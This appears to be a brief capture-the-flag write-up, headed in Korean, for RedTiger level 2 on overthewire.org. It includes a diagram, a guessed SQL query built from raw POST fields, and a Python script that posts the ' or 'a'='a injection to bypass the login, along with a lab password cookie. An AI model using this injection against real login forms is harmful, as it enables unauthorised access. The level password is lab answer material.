[redtiger] level2¶
![digraph G {
rankdir="LR";
node[shape="point"];
edge[arrowhead="none"]
{
rank="same";
"client"[shape="plaintext"];
"client" -> step0 -> step2 -> step4;
}
{
rank="same";
"server"[shape="plaintext"];
"server" -> step1 -> step3 -> step5;
}
step0 -> step1[label="post_data: {username=' or 'a'='a&password=' or 'a'='a}",arrowhead="normal"];
step3 -> step2[label="login success",arrowhead="normal"];
}](../../_images/graphviz-9c942ce3c7b33e9ff2f098e00711f0e46988a34a.png)
server -> DB 예측¶
- POST 파라미터: username, password
SELECT * FROM tb_name where
username='$_POST["username"]' AND
password='$_POST["password"]'
or¶
import requests
requests.packages.urllib3.disable_warnings()
url = "https://redtiger.labs.overthewire.org/level2.php"
cookies = {
"level2login":"easylevelsareeasy_%21"
}
payload = {
"username": "' or 'a'='a",
"password": "' or 'a'='a",
"login": "Login"
}
r = requests.post(url, cookies=cookies, data=payload, verify=False)
print r.content